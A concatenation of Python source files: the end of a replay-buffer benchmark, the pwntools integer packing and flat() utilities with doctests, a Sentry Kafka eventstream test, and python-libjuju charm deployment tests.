# memo = MemoryTuple(memo_max_len)
memo = BufferArray(memo_max_len, state_dim, action_dim)
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for i in range(8):
uniform_exploration(env, max_step, max_action, gamma, reward_scale, memo, action_dim)
for _ in range(max_step):
batches = memo.random_sample(batch_size, device)
for batch in batches:
assert torch.is_tensor(batch)
print("Used Time: {:.1f}".format(timer() - start_time))
if __name__ == '__main__':
run_compare_speed_of_replay_buffer()
|
the-stack_0_12390 | # -*- coding: utf-8 -*-
r"""
Module for packing and unpacking integers.
Simplifies access to the standard ``struct.pack`` and ``struct.unpack``
functions, and also adds support for packing/unpacking arbitrary-width
integers.
The packers are all context-aware for ``endian`` and ``signed`` arguments,
though they can be overridden in the parameters.
Examples:
>>> p8(0)
b'\x00'
>>> p32(0xdeadbeef)
b'\xef\xbe\xad\xde'
>>> p32(0xdeadbeef, endian='big')
b'\xde\xad\xbe\xef'
>>> with context.local(endian='big'): p32(0xdeadbeef)
b'\xde\xad\xbe\xef'
Make a frozen packer, which does not change with context.
>>> p=make_packer('all')
>>> p(0xff)
b'\xff'
>>> p(0x1ff)
b'\xff\x01'
>>> with context.local(endian='big'): print(repr(p(0x1ff)))
b'\xff\x01'
"""
from __future__ import absolute_import
from __future__ import division
import collections
import six
import struct
import sys
from six.moves import range
from pwnlib.context import LocalNoarchContext
from pwnlib.context import context
from pwnlib.log import getLogger
from pwnlib.util import iters
mod = sys.modules[__name__]
log = getLogger(__name__)
def pack(number, word_size = None, endianness = None, sign = None, **kwargs):
"""pack(number, word_size = None, endianness = None, sign = None, **kwargs) -> str
Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" will output a string long enough to contain all the significant
bits and thus be decodable by :func:`unpack`.
`word_size` can be any positive number. The output will contain word_size/8
rounded up number of bytes. If word_size is not a multiple of 8, it will be
padded with zeroes up to a byte boundary.
Arguments:
number (int): Number to convert
word_size (int): Word size of the converted integer or the string 'all' (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The packed number as a string.
Examples:
>>> pack(0x414243, 24, 'big', True)
b'ABC'
>>> pack(0x414243, 24, 'little', True)
b'CBA'
>>> pack(0x814243, 24, 'big', False)
b'\\x81BC'
>>> pack(0x814243, 24, 'big', True)
Traceback (most recent call last):
...
ValueError: pack(): number does not fit within word_size
>>> pack(0x814243, 25, 'big', True)
b'\\x00\\x81BC'
>>> pack(-1, 'all', 'little', True)
b'\\xff'
>>> pack(-256, 'all', 'big', True)
b'\\xff\\x00'
>>> pack(0x0102030405, 'all', 'little', True)
b'\\x05\\x04\\x03\\x02\\x01'
>>> pack(-1)
b'\\xff\\xff\\xff\\xff'
>>> pack(0x80000000, 'all', 'big', True)
b'\\x00\\x80\\x00\\x00\\x00'
"""
if sign is None and number < 0:
sign = True
if word_size != 'all':
kwargs.setdefault('word_size', word_size)
kwargs.setdefault('endianness', endianness)
kwargs.setdefault('sign', sign)
with context.local(**kwargs):
# Lookup in context if not found
word_size = 'all' if word_size == 'all' else context.word_size
endianness = context.endianness
sign = context.sign
if not isinstance(number, six.integer_types):
raise ValueError("pack(): number must be of type (int,long) (got %r)" % type(number))
if not isinstance(sign, bool):
raise ValueError("pack(): sign must be either True or False (got %r)" % sign)
if endianness not in ['little', 'big']:
raise ValueError("pack(): endianness must be either 'little' or 'big' (got %r)" % endianness)
# Verify that word_size make sense
if word_size == 'all':
if number == 0:
word_size = 8
elif number > 0:
if sign:
word_size = (number.bit_length() | 7) + 1
else:
word_size = ((number.bit_length() - 1) | 7) + 1
else:
if not sign:
raise ValueError("pack(): number does not fit within word_size")
word_size = ((number + 1).bit_length() | 7) + 1
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("pack(): word_size must be a positive integer or the string 'all'")
if sign:
limit = 1 << (word_size-1)
if not -limit <= number < limit:
raise ValueError("pack(): number does not fit within word_size")
else:
limit = 1 << word_size
if not 0 <= number < limit:
raise ValueError("pack(): number does not fit within word_size [%i, %r, %r]" % (0, number, limit))
# Normalize number and size now that we have verified them
# From now on we can treat positive and negative numbers the same
number = number & ((1 << word_size) - 1)
byte_size = (word_size + 7) // 8
out = []
for _ in range(byte_size):
out.append(_p8lu(number & 0xff))
number = number >> 8
if endianness == 'little':
return b''.join(out)
else:
return b''.join(reversed(out))
@LocalNoarchContext
def unpack(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None, **kwargs) -> int
Packs arbitrary-sized integer.
Word-size, endianness and signedness is done according to context.
`word_size` can be any positive number or the string "all". Choosing the
string "all" is equivalent to ``len(data)*8``.
If `word_size` is not a multiple of 8, then the bits used for padding
are discarded.
Arguments:
number (int): String to convert
word_size (int): Word size of the converted integer or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked number.
Examples:
>>> hex(unpack(b'\\xaa\\x55', 16, endian='little', sign=False))
'0x55aa'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=False))
'0xaa55'
>>> hex(unpack(b'\\xaa\\x55', 16, endian='big', sign=True))
'-0x55ab'
>>> hex(unpack(b'\\xaa\\x55', 15, endian='big', sign=True))
'0x2a55'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='little', sign=True))
'0x302ff'
>>> hex(unpack(b'\\xff\\x02\\x03', 'all', endian='big', sign=True))
'-0xfdfd'
"""
# Lookup in context if not found
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
# Verify that word_size make sense
if word_size == 'all':
word_size = len(data) * 8
elif not isinstance(word_size, six.integer_types) or word_size <= 0:
raise ValueError("unpack(): word_size must be a positive integer or the string 'all'")
byte_size = (word_size + 7) // 8
if byte_size != len(data):
raise ValueError("unpack(): data must have length %d, since word_size was %d" % (byte_size, word_size))
number = 0
if endianness == "little":
data = reversed(data)
data = bytearray(data)
for c in data:
number = (number << 8) + c
number = number & ((1 << word_size) - 1)
if not sign:
return int(number)
signbit = number & (1 << (word_size-1))
return int(number - 2*signbit)
@LocalNoarchContext
def unpack_many(data, word_size = None):
"""unpack(data, word_size = None, endianness = None, sign = None) -> int list
Splits `data` into groups of ``word_size//8`` bytes and calls :func:`unpack` on each group. Returns a list of the results.
`word_size` must be a multiple of `8` or the string "all". In the latter case a singleton list will always be returned.
Args
number (int): String to convert
word_size (int): Word size of the converted integers or the string "all" (in bits).
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer (False/True)
kwargs: Anything that can be passed to context.local
Returns:
The unpacked numbers.
Examples:
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='little', sign=False)))
['0x55aa', '0x33cc']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=False)))
['0xaa55', '0xcc33']
>>> list(map(hex, unpack_many(b'\\xaa\\x55\\xcc\\x33', 16, endian='big', sign=True)))
['-0x55ab', '-0x33cd']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='little', sign=True)))
['0x302ff']
>>> list(map(hex, unpack_many(b'\\xff\\x02\\x03', 'all', endian='big', sign=True)))
['-0xfdfd']
"""
# Lookup in context if None
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size == 'all':
return [unpack(data, word_size)]
# Currently we only group on byte boundaries
if word_size % 8 != 0:
raise ValueError("unpack_many(): word_size must be a multiple of 8")
out = []
n = word_size // 8
for i in range(0, len(data), n):
out.append(unpack(data[i:i+n], word_size))
return list(map(int, out))
#
# Make individual packers, e.g. _p8lu
#
ops = {'p': struct.pack, 'u': lambda *a: struct.unpack(*(
x.encode('latin1') if not hasattr(x, 'decode') else x
for x in a))[0]}
sizes = {8:'b', 16:'h', 32:'i', 64:'q'}
ends = ['b','l']
signs = ['s','u']
def make_single(op,size,end,sign):
name = '_%s%s%s%s' % (op, size, end, sign)
fmt = sizes[size]
end = '>' if end == 'b' else '<'
if sign == 'u':
fmt = fmt.upper()
fmt = end+fmt
def routine(data):
return ops[op](fmt,data)
routine.__name__ = routine.__qualname__ = name
return name, routine
for op,size,end,sign in iters.product(ops, sizes, ends, signs):
name, routine = make_single(op,size,end,sign)
setattr(mod, name, routine)
return_types = {'p': 'str', 'u': 'int'}
op_verbs = {'p': 'pack', 'u': 'unpack'}
arg_doc = {'p': 'number (int): Number to convert',
'u': 'data (str): String to convert'}
rv_doc = {'p': 'The packed number as a string',
'u': 'The unpacked number'}
#
# Make normal user-oriented packers, e.g. p8
#
def make_multi(op, size):
name = "%s%s" % (op,size)
ls = getattr(mod, "_%sls" % (name))
lu = getattr(mod, "_%slu" % (name))
bs = getattr(mod, "_%sbs" % (name))
bu = getattr(mod, "_%sbu" % (name))
@LocalNoarchContext
def routine(number):
endian = context.endian
signed = context.signed
return {("little", True ): ls,
("little", False): lu,
("big", True ): bs,
("big", False): bu}[endian, signed](number)
routine.__name__ = name
routine.__doc__ = """%s%s(number, sign, endian, ...) -> %s
%ss an %s-bit integer
Arguments:
%s
endianness (str): Endianness of the converted integer ("little"/"big")
sign (str): Signedness of the converted integer ("unsigned"/"signed")
kwargs (dict): Arguments passed to context.local(), such as
``endian`` or ``signed``.
Returns:
%s
""" % (op, size, return_types[op], op_verbs[op].title(), size, arg_doc[op], rv_doc[op])
return name, routine
for op,size in iters.product(ops, sizes):
name, routine = make_multi(op,size)
setattr(mod, name, routine)
def make_packer(word_size = None, sign = None, **kwargs):
"""make_packer(word_size = None, endianness = None, sign = None) -> number → str
Creates a packer by "freezing" the given arguments.
Semantically calling ``make_packer(w, e, s)(data)`` is equivalent to calling
``pack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer or the string all (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a number and returns a string
of that number in a packed form.
Examples:
>>> p = make_packer(32, endian='little', sign='unsigned')
>>> p
<function _p32lu at 0x...>
>>> p(42)
b'*\\x00\\x00\\x00'
>>> p(-1)
Traceback (most recent call last):
...
error: integer out of range for 'I' format code
>>> make_packer(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
with context.local(sign=sign, **kwargs):
word_size = word_size or context.word_size
endianness = context.endianness
sign = sign if sign is None else context.sign
if word_size in [8, 16, 32, 64]:
packer = {
(8, 0, 0): _p8lu,
(8, 0, 1): _p8ls,
(8, 1, 0): _p8bu,
(8, 1, 1): _p8bs,
(16, 0, 0): _p16lu,
(16, 0, 1): _p16ls,
(16, 1, 0): _p16bu,
(16, 1, 1): _p16bs,
(32, 0, 0): _p32lu,
(32, 0, 1): _p32ls,
(32, 1, 0): _p32bu,
(32, 1, 1): _p32bs,
(64, 0, 0): _p64lu,
(64, 0, 1): _p64ls,
(64, 1, 0): _p64bu,
(64, 1, 1): _p64bs,
}.get((word_size, {'big': 1, 'little': 0}[endianness], sign), None)
if packer:
return packer
return lambda number: pack(number, word_size, endianness, sign)
@LocalNoarchContext
def make_unpacker(word_size = None, endianness = None, sign = None, **kwargs):
"""make_unpacker(word_size = None, endianness = None, sign = None, **kwargs) -> str → number
Creates a unpacker by "freezing" the given arguments.
Semantically calling ``make_unpacker(w, e, s)(data)`` is equivalent to calling
``unpack(data, w, e, s)``. If word_size is one of 8, 16, 32 or 64, it is however
faster to call this function, since it will then use a specialized version.
Arguments:
word_size (int): The word size to be baked into the returned packer (in bits).
endianness (str): The endianness to be baked into the returned packer. ("little"/"big")
sign (str): The signness to be baked into the returned packer. ("unsigned"/"signed")
kwargs: Additional context flags, for setting by alias (e.g. ``endian=`` rather than index)
Returns:
A function, which takes a single argument in the form of a string and returns a number
of that string in an unpacked form.
Examples:
>>> u = make_unpacker(32, endian='little', sign='unsigned')
>>> u
<function _u32lu at 0x...>
>>> hex(u('/bin'))
'0x6e69622f'
>>> u('abcde')
Traceback (most recent call last):
...
error: unpack requires a string argument of length 4
>>> make_unpacker(33, endian='little', sign='unsigned')
<function ...<lambda> at 0x...>
"""
word_size = word_size or context.word_size
endianness = context.endianness
sign = context.sign
if word_size in [8, 16, 32, 64]:
endianness = 1 if endianness == 'big' else 0
return {
(8, 0, 0): _u8lu,
(8, 0, 1): _u8ls,
(8, 1, 0): _u8bu,
(8, 1, 1): _u8bs,
(16, 0, 0): _u16lu,
(16, 0, 1): _u16ls,
(16, 1, 0): _u16bu,
(16, 1, 1): _u16bs,
(32, 0, 0): _u32lu,
(32, 0, 1): _u32ls,
(32, 1, 0): _u32bu,
(32, 1, 1): _u32bs,
(64, 0, 0): _u64lu,
(64, 0, 1): _u64ls,
(64, 1, 0): _u64bu,
(64, 1, 1): _u64bs,
}[word_size, endianness, sign]
else:
return lambda number: unpack(number, word_size, endianness, sign)
def _fit(pieces, preprocessor, packer, filler):
# Pulls bytes from `filler` and adds them to `pad` until it ends in `key`.
# Returns the index of `key` in `pad`.
pad = bytearray()
def fill(key):
key = bytearray(key)
offset = pad.find(key)
while offset == -1:
pad.append(next(filler))
offset = pad.find(key, -len(key))
return offset
# Key conversion:
# - convert str/unicode keys to offsets
# - convert large int (no null-bytes in a machine word) keys to offsets
pieces_ = dict()
large_key = 2**(context.word_size-8)
for k, v in pieces.items():
if isinstance(k, six.integer_types):
if k >= large_key:
k = fill(pack(k))
elif isinstance(k, six.text_type):
k = fill(k.encode('utf8'))
elif isinstance(k, (bytearray, bytes)):
k = fill(k)
else:
raise TypeError("flat(): offset must be of type int or str, but got '%s'" % type(k))
if k in pieces_:
raise ValueError("flag(): multiple values at offset %d" % k)
pieces_[k] = v
pieces = pieces_
# We must "roll back" `filler` so each recursive call to `_flat` gets it in
# the right position
filler = iters.chain(pad, filler)
# Build output
out = b''
# Negative indices need to be removed and then re-submitted
negative = {k:v for k,v in pieces.items() if isinstance(k, int) and k<0}
for k in negative:
del pieces[k]
# Positive output
for k, v in sorted(pieces.items()):
if k < len(out):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out) < k:
out += p8(next(filler))
# Recursively flatten data
out += _flat([v], preprocessor, packer, filler)
# Now do negative indices
out_negative = b''
if negative:
most_negative = min(negative.keys())
for k, v in sorted(negative.items()):
k += -most_negative
if k < len(out_negative):
raise ValueError("flat(): data at offset %d overlaps with previous data which ends at offset %d" % (k, len(out)))
# Fill up to offset
while len(out_negative) < k:
out_negative += p8(next(filler))
# Recursively flatten data
out_negative += _flat([v], preprocessor, packer, filler)
return filler, out_negative + out
def _flat(args, preprocessor, packer, filler):
out = []
for arg in args:
if not isinstance(arg, (list, tuple, dict)):
arg_ = preprocessor(arg)
if arg_ is not None:
arg = arg_
if hasattr(arg, '__flat__'):
val = arg.__flat__()
elif isinstance(arg, (list, tuple)):
val = _flat(arg, preprocessor, packer, filler)
elif isinstance(arg, dict):
filler, val = _fit(arg, preprocessor, packer, filler)
elif isinstance(arg, bytes):
val = arg
elif isinstance(arg, six.text_type):
val = arg.encode('utf8')
elif isinstance(arg, six.integer_types):
val = packer(arg)
elif isinstance(arg, bytearray):
val = bytes(arg)
else:
raise ValueError("flat(): Flat does not support values of type %s" % type(arg))
out.append(val)
# Advance `filler` for "non-recursive" values
if not isinstance(arg, (list, tuple, dict)):
for _ in range(len(val)):
next(filler)
return b''.join(out)
@LocalNoarchContext
def flat(*args, **kwargs):
r"""flat(\*args, preprocessor = None, length = None, filler = de_bruijn(),
word_size = None, endianness = None, sign = None) -> str
Flattens the arguments into a string.
This function takes an arbitrary number of arbitrarily nested lists, tuples
and dictionaries. It will then find every string and number inside those
and flatten them out. Strings are inserted directly while numbers are
packed using the :func:`pack` function. Unicode strings are UTF-8 encoded.
Dictionary keys give offsets at which to place the corresponding values
(which are recursively flattened). Offsets are relative to where the
flattened dictionary occurs in the output (i.e. `{0: 'foo'}` is equivalent
to `'foo'`). Offsets can be integers, unicode strings or regular strings.
Integer offsets >= ``2**(word_size-8)`` are converted to a string using
`:func:pack`. Unicode strings are UTF-8 encoded. After these conversions
offsets are either integers or strings. In the latter case, the offset will
be the lowest index at which the string occurs in `filler`. See examples
below.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will be padded with bytes from `filler` to
be this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
The three kwargs `word_size`, `endianness` and `sign` will default to using
values in :mod:`pwnlib.context` if not specified as an argument.
Arguments:
args: Values to flatten
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
length: The length of the output.
filler: Iterable to use for padding.
word_size (int): Word size of the converted integer.
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
(Test setup, please ignore)
>>> context.clear()
Basic usage of :meth:`flat` works similar to the pack() routines.
>>> flat(4)
b'\x04\x00\x00\x00'
:meth:`flat` works with strings, bytes, lists, and dictionaries.
>>> flat(b'X')
b'X'
>>> flat([1,2,3])
b'\x01\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00'
>>> flat({4:'X'})
b'aaaaX'
:meth:`.flat` flattens all of the values provided, and allows nested lists
and dictionaries.
>>> flat([{4:'X'}] * 2)
b'aaaaXaaacX'
>>> flat([[[[[[[[[1]]]], 2]]]]])
b'\x01\x00\x00\x00\x02\x00\x00\x00'
You can also provide additional arguments like endianness, word-size, and
whether the values are treated as signed or not.
>>> flat(1, "test", [[["AB"]*2]*3], endianness = 'little', word_size = 16, sign = False)
b'\x01\x00testABABABABABAB'
A preprocessor function can be provided in order to modify the values in-flight.
This example converts increments each value by 1, then converts to a string.
>>> flat([1, [2, 3]], preprocessor = lambda x: str(x+1))
b'234'
Using dictionaries is a fast way to get specific values at specific offsets,
without having to do ``data += "foo"`` repeatedly.
>>> flat({12: 0x41414141,
... 24: 'Hello',
... })
b'aaaabaaacaaaAAAAeaaafaaaHello'
Dictionary usage permits directly using values derived from :func:`.cyclic`.
See :func:`.cyclic`, :function:`pwnlib.context.context.cyclic_alphabet`, and :data:`.context.cyclic_size`
for more options.
The cyclic pattern can be provided as either the text or hexadecimal offset.
>>> flat({ 0x61616162: 'X'})
b'aaaaX'
>>> flat({'baaa': 'X'})
b'aaaaX'
Fields do not have to be in linear order, and can be freely mixed.
This also works with cyclic offsets.
>>> flat({2: 'A', 0:'B'})
b'BaA'
>>> flat({0x61616161:'x', 0x61616162:'y'})
b'xaaay'
>>> flat({0x61616162:'y', 0x61616161:'x'})
b'xaaay'
Fields do not have to be in order, and can be freely mixed.
>>> flat({'caaa': 'XXXX', 16: '\x41', 20: 0xdeadbeef})
b'aaaabaaaXXXXdaaaAaaa\xef\xbe\xad\xde'
>>> flat({ 8: [0x41414141, 0x42424242], 20: 'CCCC'})
b'aaaabaaaAAAABBBBeaaaCCCC'
>>> fit({
... 0x61616161: 'a',
... 1: 'b',
... 0x61616161+2: 'c',
... 3: 'd',
... })
b'abadbaaac'
By default, gaps in the data are filled in with the :meth:`.cyclic` pattern.
You can customize this by providing an iterable or method for the ``filler``
argument.
>>> flat({12: 'XXXX'}, filler = b'_', length = 20)
b'____________XXXX____'
>>> flat({12: 'XXXX'}, filler = b'AB', length = 20)
b'ABABABABABABXXXXABAB'
Nested dictionaries also work as expected.
>>> flat({4: {0: 'X', 4: 'Y'}})
b'aaaaXaaaY'
>>> fit({4: {4: 'XXXX'}})
b'aaaabaaaXXXX'
Negative indices are also supported, though this only works for integer
keys.
>>> flat({-4: 'x', -1: 'A', 0: '0', 4:'y'})
b'xaaA0aaay'
"""
# HACK: To avoid circular imports we need to delay the import of `cyclic`
from pwnlib.util import cyclic
preprocessor = kwargs.pop('preprocessor', lambda x: None)
filler = kwargs.pop('filler', cyclic.de_bruijn())
length = kwargs.pop('length', None)
if isinstance(filler, str):
filler = bytearray(six.ensure_binary(filler))
if kwargs != {}:
raise TypeError("flat() does not support argument %r" % kwargs.popitem()[0])
filler = iters.cycle(filler)
out = _flat(args, preprocessor, make_packer(), filler)
if length:
if len(out) > length:
raise ValueError("flat(): Arguments does not fit within `length` (= %d) bytes" % length)
out += b''.join(p8(next(filler)) for _ in range(length - len(out)))
return out
def fit(*args, **kwargs):
"""Legacy alias for :func:`flat`"""
return flat(*args, **kwargs)
"""
Generates a string from a dictionary mapping offsets to data to place at
that offset.
For each key-value pair in `pieces`, the key is either an offset or a byte
sequence. In the latter case, the offset will be the lowest index at which
the sequence occurs in `filler`. See examples below.
Each piece of data is passed to :meth:`flat` along with the keyword
arguments `word_size`, `endianness` and `sign`.
Space between pieces of data is filled out using the iterable `filler`. The
`n`'th byte in the output will be byte at index ``n % len(iterable)`` byte
in `filler` if it has finite length or the byte at index `n` otherwise.
If `length` is given, the output will padded with bytes from `filler` to be
this size. If the output is longer than `length`, a :py:exc:`ValueError`
exception is raised.
If entries in `pieces` overlap, a :py:exc:`ValueError` exception is
raised.
Arguments:
pieces: Offsets and values to output.
length: The length of the output.
filler: Iterable to use for padding.
preprocessor (function): Gets called on every element to optionally
transform the element before flattening. If :const:`None` is
returned, then the original value is used.
word_size (int): Word size of the converted integer (in bits).
endianness (str): Endianness of the converted integer ("little"/"big").
sign (str): Signedness of the converted integer (False/True)
Examples:
"""
def signed(integer):
return unpack(pack(integer), signed=True)
def unsigned(integer):
return unpack(pack(integer))
def dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False):
"""dd(dst, src, count = 0, skip = 0, seek = 0, truncate = False) -> dst
Inspired by the command line tool ``dd``, this function copies `count` byte
values from offset `seek` in `src` to offset `skip` in `dst`. If `count` is
0, all of ``src[seek:]`` is copied.
If `dst` is a mutable type it will be updated. Otherwise a new instance of
the same type will be created. In either case the result is returned.
`src` can be an iterable of characters or integers, a unicode string or a
file object. If it is an iterable of integers, each integer must be in the
range [0;255]. If it is a unicode string, its UTF-8 encoding will be used.
The seek offset of file objects will be preserved.
Arguments:
dst: Supported types are `:class:file`, `:class:list`, `:class:tuple`,
`:class:str`, `:class:bytearray` and `:class:unicode`.
src: An iterable of byte values (characters or integers), a unicode
string or a file object.
count (int): How many bytes to copy. If `count` is 0 or larger than
``len(src[seek:])``, all bytes until the end of `src` are
copied.
skip (int): Offset in `dst` to copy to.
seek (int): Offset in `src` to copy from.
truncate (bool): If `:const:True`, `dst` is truncated at the last copied
byte.
Returns:
A modified version of `dst`. If `dst` is a mutable type it will be
modified in-place.
Examples:
>>> dd(tuple('Hello!'), b'?', skip = 5)
('H', 'e', 'l', 'l', 'o', b'?')
>>> dd(list('Hello!'), (63,), skip = 5)
['H', 'e', 'l', 'l', 'o', b'?']
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4).read()
'AAA\\x00\\x00\\x00\\x00AAA'
>>> _ = open('/tmp/foo', 'w').write('A' * 10)
>>> dd(open('/tmp/foo'), open('/dev/zero'), skip = 3, count = 4, truncate = True).read()
'AAA\\x00\\x00\\x00\\x00'
"""
# Re-open file objects to make sure we have the mode right
if hasattr(src, 'name'):
src = open(src.name, 'rb')
if hasattr(dst, 'name'):
real_dst = dst
dst = open(dst.name, 'rb+')
# Special case: both `src` and `dst` are files, so we don't need to hold
# everything in memory
if hasattr(src, 'seek') and hasattr(dst, 'seek'):
src.seek(seek)
dst.seek(skip)
n = 0
if count:
while n < count:
s = src.read(min(count - n, 0x1000))
if not s:
break
n += len(s)
dst.write(s)
else:
while True:
s = src.read(0x1000)
if not s:
break
n += len(s)
dst.write(s)
if truncate:
dst.truncate(skip + n)
src.close()
dst.close()
return real_dst
# Otherwise get `src` in canonical form, i.e. a string of at most `count`
# bytes
if isinstance(src, six.text_type):
if count:
# The only way to know where the `seek`th byte is, is to decode, but
# we only need to decode up to the first `seek + count` code points
src = src[:seek + count].encode('utf8')
# The code points may result in more that `seek + count` bytes
src = src[seek : seek + count]
else:
src = src.encode('utf8')[seek:]
elif hasattr(src, 'seek'):
src.seek(seek)
src_ = b''
if count:
while len(src_) < count:
s = src.read(count - len(src_))
if not s:
break
src_ += s
else:
while True:
s = src.read()
if not s:
break
src_ += s
src.close()
src = src_
elif isinstance(src, bytes):
if count:
src = src[seek : seek + count]
else:
src = src[seek:]
elif hasattr(src, '__iter__'):
src = src[seek:]
src_ = b''
for i, b in enumerate(src, seek):
if count and i > count + seek:
break
if isinstance(b, bytes):
src_ += b
elif isinstance(b, six.integer_types):
if b > 255 or b < 0:
raise ValueError("dd(): Source value %d at index %d is not in range [0;255]" % (b, i))
src_ += _p8lu(b)
else:
raise TypeError("dd(): Unsupported `src` element type: %r" % type(b))
src = src_
else:
raise TypeError("dd(): Unsupported `src` type: %r" % type(src))
# If truncate, then where?
if truncate:
truncate = skip + len(src)
# UTF-8 encode unicode `dst`
if isinstance(dst, six.text_type):
dst = dst.encode('utf8')
utf8 = True
else:
utf8 = False
# Match on the type of `dst`
if hasattr(dst, 'seek'):
dst.seek(skip)
dst.write(src)
if truncate:
dst.truncate(truncate)
dst.close()
dst = real_dst
elif isinstance(dst, (list, bytearray)):
dst[skip : skip + len(src)] = list(map(p8, bytearray(src)))
if truncate:
while len(dst) > truncate:
dst.pop()
elif isinstance(dst, tuple):
tail = dst[skip + len(src):]
dst = dst[:skip] + tuple(map(p8, bytearray(src)))
if not truncate:
dst = dst + tail
elif isinstance(dst, bytes):
tail = dst[skip + len(src):]
dst = dst[:skip] + src
if not truncate:
dst = dst + tail
else:
raise TypeError("dd(): Unsupported `dst` type: %r" % type(dst))
if utf8:
dst = dst.decode('utf8')
return dst
del op, size, end, sign
del name, routine, mod
|
the-stack_0_12391 | from __future__ import absolute_import
from datetime import datetime, timedelta
import six
import time
import logging
from mock import patch, Mock
from sentry.event_manager import EventManager
from sentry.eventstream.kafka import KafkaEventStream
from sentry.testutils import SnubaTestCase
from sentry.utils import snuba, json
class SnubaEventStreamTest(SnubaTestCase):
def setUp(self):
super(SnubaEventStreamTest, self).setUp()
self.kafka_eventstream = KafkaEventStream()
self.kafka_eventstream.producer = Mock()
@patch('sentry.eventstream.insert')
def test(self, mock_eventstream_insert):
now = datetime.utcnow()
def _get_event_count():
return snuba.query(
start=now - timedelta(days=1),
end=now + timedelta(days=1),
groupby=['project_id'],
filter_keys={'project_id': [self.project.id]},
).get(self.project.id, 0)
assert _get_event_count() == 0
raw_event = {
'event_id': 'a' * 32,
'message': 'foo',
'timestamp': time.mktime(now.timetuple()),
'level': logging.ERROR,
'logger': 'default',
'tags': [],
}
manager = EventManager(raw_event)
manager.normalize()
event = manager.save(self.project.id)
# verify eventstream was called by EventManager
insert_args, insert_kwargs = list(mock_eventstream_insert.call_args)
assert not insert_args
assert insert_kwargs == {
'event': event,
'group': event.group,
'is_new_group_environment': True,
'is_new': True,
'is_regression': False,
'is_sample': False,
'primary_hash': 'acbd18db4cc2f85cedef654fccc4a4d8',
'skip_consume': False
}
# pass arguments on to Kafka EventManager
self.kafka_eventstream.insert(*insert_args, **insert_kwargs)
produce_args, produce_kwargs = list(self.kafka_eventstream.producer.produce.call_args)
assert not produce_args
assert produce_kwargs['topic'] == 'events'
assert produce_kwargs['key'] == six.text_type(self.project.id)
version, type_, primary_payload = json.loads(produce_kwargs['value'])[:3]
assert version == 2
assert type_ == 'insert'
# insert what would have been the Kafka payload directly
# into Snuba, expect an HTTP 200 and for the event to now exist
snuba.insert_raw([primary_payload])
assert _get_event_count() == 1
|
the-stack_0_12392 | import pytest
from .. import base
MB = 1
@base.bootstrapped
@pytest.mark.asyncio
async def test_action(event_loop):
async with base.CleanModel() as model:
ubuntu_app = await model.deploy(
'mysql',
application_name='mysql',
series='trusty',
channel='stable',
config={
'tuning-level': 'safest',
},
constraints={
'mem': 256 * MB,
},
)
# update and check app config
await ubuntu_app.set_config({'tuning-level': 'fast'})
config = await ubuntu_app.get_config()
assert config['tuning-level']['value'] == 'fast'
# update and check app constraints
await ubuntu_app.set_constraints({'mem': 512 * MB})
constraints = await ubuntu_app.get_constraints()
assert constraints['mem'] == 512 * MB
@base.bootstrapped
@pytest.mark.asyncio
async def test_add_units(event_loop):
from juju.unit import Unit
async with base.CleanModel() as model:
app = await model.deploy(
'ubuntu-0',
application_name='ubuntu',
series='trusty',
channel='stable',
)
units = await app.add_units(count=2)
assert len(units) == 2
for unit in units:
assert isinstance(unit, Unit)
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm()
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_channel(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(channel='stable')
assert app.data['charm-url'].startswith('cs:ubuntu-')
assert app.data['charm-url'] != 'cs:ubuntu-0'
@base.bootstrapped
@pytest.mark.asyncio
async def test_upgrade_charm_revision(event_loop):
async with base.CleanModel() as model:
app = await model.deploy('ubuntu-0')
assert app.data['charm-url'] == 'cs:ubuntu-0'
await app.upgrade_charm(revision=8)
